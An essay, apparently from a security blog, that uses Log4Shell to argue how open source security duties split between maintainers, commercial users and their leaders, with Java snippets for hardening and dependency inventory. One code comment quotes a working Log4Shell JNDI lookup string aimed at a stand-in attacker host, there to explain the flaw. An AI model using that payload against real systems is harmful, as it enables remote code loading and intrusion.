

When companies embed open source software within their commercial products, who should be held responsible when things go wrong?

The Log4Shell incident is a prime example. Its aftermath brought plenty of public finger-pointing: the classic response to a big problem, with victims claiming it’s not their fault and vendors offering up solutions and prescriptions that, invariably, serve more as marketing than post-mortem analysis.

Here I’m sharing my answer to the question of who is responsible for open source software security, using Log4Shell as a case study. I’ll explain why, in situations like this, certain security responsibilities, such as documentation, should be shared by maintainers and users, whereas testing for flaws should fall to user organizations. I’ll also share why leaders in these companies should be building cultures of ownership when it comes to using (and monetizing) open source software in their own products.


Software that’s a gift vs. a product

Open source software comes in many flavors. For security purposes, a key distinction is whether a software package, library, or application is a product or a gift. A product is supported by a commercial vendor or company. A gift is not backed by a vendor: it comes without warranty and is supported only by community best efforts. Both types of OSS are critical in our technology ecosystem and supply chain.

The mistake many organizations made with Log4J was assuming it was a product, due to its affiliation with the Apache Software Foundation, when it was really a gift, to be accepted caveat emptor. Gifts must be treated very differently than products.

We can’t just say ‘pay the maintainers!’ Many don’t actually want to be paid and don’t want the hassle of increased responsibility. They just like writing code that people use. Once we acknowledge and understand this distinction, we can begin to properly address the question of who’s responsible for the security of gifted software like Log4J.

Creating documentation is a shared responsibility

Software that’s a gift usually comes with some sort of documentation. But that documentation is rarely sufficient; it doesn’t provide all the details and warning labels. This was true of Log4J: there was no warning that it was effectively an open communications channel that needed to be segmented and controlled.
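
To make that concrete, here is a minimal sketch of why that mattered. The class and method names are hypothetical; the underlying behavior is the published Log4Shell mechanism, in which vulnerable Log4J 2.x versions scanned logged messages for ${...} lookups, so logging attacker-controlled input could trigger an outbound JNDI request.

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

// Hypothetical request handler illustrating the Log4Shell pattern: on vulnerable
// Log4J 2.x versions, the logged message is scanned for ${...} lookups, so an
// attacker-supplied username such as "${jndi:ldap://attacker.example.com/a}"
// causes the JVM to make an outbound JNDI/LDAP request - an open communications
// channel hiding inside an ordinary log line.
public class LoginHandler {
    private static final Logger log = LogManager.getLogger(LoginHandler.class);

    public void handleLogin(String username) {
        // Looks like routine, well-intentioned logging of untrusted input.
        log.info("Login attempt for user: {}", username);
    }
}
```

The point is not the specific payload, but that nothing in the documentation signaled that logging untrusted input carried this kind of network-facing risk.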

To get this level of detail, maintainers and users need to meet in the middle, collaborating on a list of warnings and operating instructions that covers security. Some of this can be automated, for example by exporting the configuration hardening that forward-thinking security teams have already adopted.

Maintainers can ideally contribute a simple list of warning bullets, while users supply the surrounding context and threat models, sharing the load. For Dev, DevOps, and SecDevOps teams, this may mean inventorying known dependencies and starting to compile a ‘missing manual’ to submit back to projects, along the lines of the sketch below.
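
What follows is a rough illustration of what such a ‘missing manual’ entry might have looked like for Log4J. The wording is mine, and the version range and property name come from the publicly published Log4Shell guidance rather than from anything the project shipped at the time.

```java
// Sketch of a "missing manual" entry a team might compile and submit upstream.
//
// WARNING: Log4J 2.x up to 2.14.1 performs ${jndi:...} lookups on logged
// messages, effectively opening an outbound communications channel from any
// process that logs untrusted input. Treat logging of external input as an
// attack surface: segment the hosts involved and restrict their egress.
//
// Operating instructions:
//   - Preferred fix: upgrade to a patched Log4J release.
//   - Interim measure on 2.10-2.14.1: disable message lookups, either with the
//     JVM flag -Dlog4j2.formatMsgNoLookups=true or programmatically before
//     Log4J initializes, as below. (This flag alone later proved insufficient
//     against some attack paths, so upgrading still matters.)
public class Log4jHardeningNote {
    public static void main(String[] args) {
        // Must run before the first Logger is created, or the setting is ignored.
        System.setProperty("log4j2.formatMsgNoLookups", "true");
    }
}
```

None of this is exotic; the value is simply having it written down next to the dependency before an incident forces the issue.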

Testing for security flaws is the user organization’s responsibility

Ultimately, if you charge for something, you own the customer experience. When a car company builds a new vehicle, it puts out specs for component parts to specialist suppliers. Those suppliers build the part to spec – an airbag, maybe – and ship it back to the automaker for comprehensive testing. When the automaker sells the car, it accepts responsibility for all components. If the airbag fails, the buyer calls the automaker, not the airbag maker.

This model should also apply to anyone who includes open source software, like Log4J, in a commercial product. The onus for testing the safety of that component falls on the company selling the end product. This is doubly true if the component is a gift with no business or dedicated resources behind it.

In practice, this means companies including open source components in products must themselves test every single open source component for potential security flaws. It’s not good enough to rely on version numbers, patching, and other security assurances provided by a gift project. The security of the components must be owned contractually, either by the company building the application or by a third party that agrees to indemnify the code.

For DevOps, SecDevOps, and AppSec teams, this will mean expanding testing to cover a wider range of libraries and building proper inventories of all nested dependencies (which a software composition analysis solution can do through automation); a rough sketch of that inventory step follows.
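
As a starting point, and only as a sketch rather than a substitute for a real software composition analysis tool (which also unpacks nested and shaded jars and matches versions against vulnerability databases), a team might inventory a deployment directory by recording the Maven coordinates embedded in each jar:

```java
import java.io.IOException;
import java.io.InputStream;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Properties;
import java.util.jar.JarFile;
import java.util.stream.Stream;

// Minimal dependency-inventory sketch: walk a directory, open every .jar, and
// print the Maven coordinates found in embedded pom.properties entries.
public class JarInventory {
    public static void main(String[] args) throws IOException {
        Path root = Paths.get(args.length > 0 ? args[0] : ".");
        try (Stream<Path> files = Files.walk(root)) {
            files.filter(p -> p.toString().endsWith(".jar"))
                 .forEach(JarInventory::report);
        }
    }

    private static void report(Path jarPath) {
        try (JarFile jar = new JarFile(jarPath.toFile())) {
            jar.stream()
               .filter(e -> e.getName().endsWith("pom.properties"))
               .forEach(e -> {
                   try (InputStream in = jar.getInputStream(e)) {
                       Properties props = new Properties();
                       props.load(in);
                       System.out.printf("%s -> %s:%s:%s%n",
                               jarPath,
                               props.getProperty("groupId"),
                               props.getProperty("artifactId"),
                               props.getProperty("version"));
                   } catch (IOException ignored) {
                       // Unreadable entry; skip it rather than abort the scan.
                   }
               });
        } catch (IOException ex) {
            System.err.println("Could not open " + jarPath + ": " + ex.getMessage());
        }
    }
}
```

Plenty of teams wrote ad-hoc scanners along these lines in the days after Log4Shell; the lesson is to have that inventory before the incident rather than after.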

Leaders in user organizations are responsible for cultural change

Ultimately, the leadership of the user organization should look in the mirror and ask, ‘why does this keep happening?’ The answer, in the end, is always culture and people.

Any problem in software is, at its core, a people problem, and it is addressable through cultural change. Even the best automation technologies, security controls, and threat management solutions offer far less protection if the culture of the development process is reactive, reliant on patching, and expectant that others will provide the solution.

To start to change the culture and better address the problems, CISOs, VPs of Security, VPs of Engineering, and CTOs of user companies need to roll up their sleeves. They need to dedicate real time to talking with their teams and participating personally in post-mortems. It can’t be lip service and directives. To make the change, leaders need to embody the change and demonstrate a willingness to take not only responsibility for the breach, but also the responsibility to teach and to change. They need to start spending more time with their teams, at every level, to understand their processes and gain the wisdom needed to be an effective agent of cultural change.

Reflections

When software is a gift, it must be supported by an entire community, documented by users and maintainers, and tested incessantly by commercial user organizations, for the collective benefit. This approach of shared burden and responsibility is the same reason OSS is so prolific and powerful.

A simple caveat about Log4J in the user manual might have prompted the majority of users to deploy the logging tool more carefully and control its access. Testing by a large enough pool of user organizations would surely have spotted the vulnerability sooner. Leaders in these organizations should have accepted that their approach of reactive security (patch and pray) was no longer viable. Going forward, these leaders should enact real change and encourage a culture of accountability.

By improving the documentation, testing, and culture surrounding open source systems, users and maintainers alike can create a foundation for safer software development and deployment that will make the next Log4J-style incident both less likely and less impactful.

